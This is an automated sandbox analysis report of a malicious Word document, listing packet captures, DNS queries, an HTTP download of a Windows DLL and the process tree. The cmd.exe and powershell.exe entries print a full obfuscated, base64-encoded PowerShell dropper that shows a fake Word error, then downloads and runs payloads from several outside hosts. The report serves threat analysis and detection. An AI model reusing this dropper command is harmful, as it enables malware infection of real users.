                                                    01/27/21-09:31:59.138097TCP2404314ET CNC Feodo Tracker Reported CnC Server TCP group 84917380192.168.2.22185.183.16.47

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 27, 2021 09:30:35.713542938 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:35.900213003 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:35.900363922 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:35.902981997 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:36.134855986 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.428189039 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.428216934 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.428234100 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.428479910 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:36.614783049 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.628119946 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.628206968 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.628264904 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.628310919 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:36.628317118 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.628351927 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:36.628376007 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.628427982 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.628451109 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:36.628480911 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.628530025 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.628556013 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:36.628585100 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.628664970 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:36.814851999 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.814924955 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.814977884 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.815032959 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.815083027 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.815114021 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:36.815140009 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.815151930 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:36.815193892 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.815216064 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:36.815248013 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.815300941 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.815315008 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:36.815354109 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.815403938 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.815418005 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:36.815455914 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.815505981 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.815526009 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:36.815565109 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.815618992 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.815642118 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:36.815670967 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.815722942 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.815737963 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:36.815773964 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.815823078 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.815840960 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:36.815869093 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:36.815946102 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:37.002271891 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.002356052 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.002454042 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:37.002504110 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.002567053 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.002626896 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.002672911 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.002753019 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:37.002835989 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.002971888 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.003051996 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.003091097 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.003109932 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:37.003144979 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.003161907 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:37.003190041 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.003237963 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.003262043 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:37.003289938 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.003334999 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.003357887 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:37.003371954 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.003412962 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.003433943 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:37.003452063 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.003488064 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.003520966 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.003520966 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:37.003577948 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:37.030143023 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.030201912 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.030241013 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.030313015 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.030350924 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.030368090 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:37.030409098 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:37.030412912 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.030492067 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:37.030515909 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.030563116 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.030577898 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.030603886 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.030641079 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:37.030656099 CET8049167192.169.223.13192.168.2.22
                                                    Jan 27, 2021 09:30:37.030690908 CET4916780192.168.2.22192.169.223.13
                                                    Jan 27, 2021 09:30:37.030699015 CET8049167192.169.223.13192.168.2.22

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 27, 2021 09:30:35.644503117 CET5219753192.168.2.228.8.8.8
                                                    Jan 27, 2021 09:30:35.703138113 CET53521978.8.8.8192.168.2.22

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    Jan 27, 2021 09:30:35.644503117 CET192.168.2.228.8.8.80xd372Standard query (0)shannared.comA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    Jan 27, 2021 09:30:35.703138113 CET8.8.8.8192.168.2.220xd372No error (0)shannared.com192.169.223.13A (IP address)IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • shannared.com

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.2249167192.169.223.1380C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jan 27, 2021 09:30:35.902981997 CET0OUTGET /content/lhALeS/ HTTP/1.1
                                                    Host: shannared.com
                                                    Connection: Keep-Alive
                                                    Jan 27, 2021 09:30:36.428189039 CET1INHTTP/1.1 200 OK
                                                    Cache-Control: no-cache, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Wed, 27 Jan 2021 08:30:36 GMT
                                                    Content-Disposition: attachment; filename="O9TGnKaUCw.dll"
                                                    Content-Transfer-Encoding: binary
                                                    Set-Cookie: 601124ac53678=1611736236; expires=Wed, 27-Jan-2021 08:31:36 GMT; Max-Age=60; path=/
                                                    Last-Modified: Wed, 27 Jan 2021 08:30:36 GMT
                                                    X-XSS-Protection: 1; mode=block
                                                    X-Content-Type-Options: nosniff
                                                    Content-Type: application/octet-stream
                                                    X-Cacheable: YES:Forced
                                                    Content-Length: 631808
                                                    Accept-Ranges: bytes
                                                    Date: Wed, 27 Jan 2021 08:30:36 GMT
                                                    Age: 0
                                                    Vary: User-Agent
                                                    X-Cache: uncached
                                                    X-Cache-Hit: MISS
                                                    X-Backend: all_requests
                                                    Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 30 06 00 00 70 03 00 00 00 00 00 bc 3e 06 00 00 10 00 00 00 40 06 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 09 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 ec 22 00 00 00 10 07 00 00 c6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 06 00 d4 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 e8 2e 06 00 00 10 00 00 00 30 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 cc 14 00 00 00 40 06 00 00 16 00 00 00 34 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 d1 0c 00 00 00 60 06 00 00 00 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ec 22 00 00 00 70 06 00 00 24 00 00 00 4a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 d4 6e 00 00 00 a0
                                                    Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*0p>@@p"nCODE.0 `DATA@4@BSS`J.idata"p$J@.relocn


                                                    Code Manipulations

                                                    Statistics

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    Analysis Process: WINWORD.EXE PID: 2408 Parent PID: 584

                                                    General

                                                    Start time:09:30:35
                                                    Start date:27/01/2021
                                                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                    Imagebase:0x13f340000
                                                    File size:1424032 bytes
                                                    MD5 hash:95C38D04597050285A18F66039EDB456
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Analysis Process: cmd.exe PID: 2516 Parent PID: 1220

                                                    General

                                                    Start time:09:30:37
                                                    Start date:27/01/2021
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3ACcAKQArACgAJwB1ACAAZAAnACsAJwBiACcAKQArACgAJwAgAG4AJwArACcAZAA6AC8AJwArACcALwAnACkAKwAoACcAbAAnACsAJwBlAG8AJwApACsAKAAnAHAAYQByACcAKwAnAGQAYwAnACkAKwAoACcAcgBhAG4AJwArACcAZQBzACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AJwArACcAegB5AG4AcQAnACkAKwAnAC0AJwArACcAbAAnACsAKAAnAGkAJwArACcAbgB1ACcAKwAnAHgAJwArACcALQB5AGEAYQB5ACcAKQArACcAZgAvACcAKwAoACcAdwAnACsAJwAvACEAbgAnACkAKwAnAHMAIAAnACsAKAAnAHcAdQAgACcAKwAnAGQAYgAnACsAJwAgACcAKQArACcAbgAnACsAJwBkACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AbQBtAHIAaQBuAGMAJwArACcAcwAuACcAKQArACgAJwBjAG8AJwArACcAbQAnACsAJwAvAGUAdABlAHIAbgBhAGwALQAnACkAKwAoACcAZAAnACsAJwB1AGUAbAAnACkAKwAoACcAaQAnACsAJwBzAHQALQAnACkAKwAoACcAOQBjAHUAJwArACcAcQB2AC8AagAnACkAKwAoACcAeAAnACsAJwBHAFEAagAvACEAJwArACcAbgAnACkAKwAoACcAcwAnACsAJwAgAHcAJwApACsAKAAnAHUAIABkACcAKwAnAGIAIABuAGQAJwArACcAOgAvACcAKQArACgAJwAvADMAJwArACcAbQB1ACcAKwAnAHMAawAnACkAKwAnAGUAdAAnACsAKAAnAGUAZQByACcAKwAnAHMAZQBuAHQALgBuAGUAJwArACcAdAAvACcAKQArACgAJwB3ACcAKwAnAHAALQBpAG4AJwArACcAYwBsAHUAZABlAHMALwBUAFUAJwArACcAZwBEAC8AIQBuACcAKwAnAHMAIAAnACkAKwAnAHcAdQAnACsAJwAgACcAKwAoACcAZAAnACsAJwBiACAAJwApACsAKAAnAG4AZAAnACsAJwBzACcAKQArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAoACcAcwAnACsAJwBrAGkAbABtAHUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB3ACcAKwAnAHAALQBhACcAKQArACcAZAAnACsAKAAnAG0AaQBuAC8AJwArACcAaAAnACsAJwBRACcAKQArACgAJwBWAGwAQgAnACsAJwA4AGIALwAnACkAKQAuACIAcgBgAGUAUABsAEEAYABjAEUAIgAoACgAKAAnAG4AcwAnACsAJwAgACcAKQArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAnAG4AZAAnACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEsAMQBpAHUAeAB4AHAALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBwAGAAbABpAFQAIgAoACQARAA1ADQAUwAgACsAIAAkAEsAbwAzAGEAYwA2ADMAIAArACAAJABGADAAOABKACkAOwAkAE8AMQA2AFIAPQAoACcAWAA2ACcAKwAnADIAVgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAEoAZAA1AHMAXwBoAGYAIABpAG4AIAAkAFQAYQAxAHkAcwBwADQAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAJwArACcAdwAtAE8AJwArACcAYgBqACcAKwAnAGUAYwB0ACcAKQAgAHMAeQBTAFQARQBNAC4ATgBlAFQALgB3AEUAQgBDAEwASQBFAG4AdAApAC4AIgBEAE8AdwBOAGAATABgAG8AQQBgAEQARgBJAGwARQAiACgAJABKAGQANQBzAF8AaABmACwAIAAkAFEAZgB4ADEAMAB4AGEAKQA7ACQATAAyADkARAA9ACgAJwBPADYAJwArACcANABIACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABRAGYAeAAxADAAeABhACkALgAiAEwAYABlAG4ARwBgAFQAaAAiACAALQBnAGUAIAA0ADQANwAxADIAKQAgAHsAJgAoACcAcgB1AG4AZAAnACsAJwBsAGwAMwAyACcAKQAgACQAUQBmAHgAMQAwAHgAYQAsACgAJwBBACcAKwAoACcAbgB5AFMAdAAnACsAJwByACcAKQArACgAJwBpACcAKwAnAG4AZwAnACkAKQAuACIAVABvAHMAYABUAFIAaQBgAE4AZwAiACgAKQA7ACQAQgAyADcAQgA9ACgAKAAnAFcANAAnACsAJwAzACcAKQArACcAUwAnACkAOwBiAHIAZQBhAGsAOwAkAFoAOAAxAFYAPQAoACcASQA2ACcAKwAnADIAWQAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEIANQA4AEkAPQAoACcATwAzACcAKwAnADUASQAnACkA
                                                    Imagebase:0x49ef0000
                                                    File size:345088 bytes
                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate

                                                    Analysis Process: msg.exe PID: 2296 Parent PID: 2516

                                                    General

                                                    Start time:09:30:37
                                                    Start date:27/01/2021
                                                    Path:C:\Windows\System32\msg.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:msg user /v Word experienced an error trying to open the file.
                                                    Imagebase:0xff080000
                                                    File size:26112 bytes
                                                    MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate

                                                    Analysis Process: powershell.exe PID: 1552 Parent PID: 2516

                                                    General

                                                    Start time:09:30:38
                                                    Start date:27/01/2021
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjA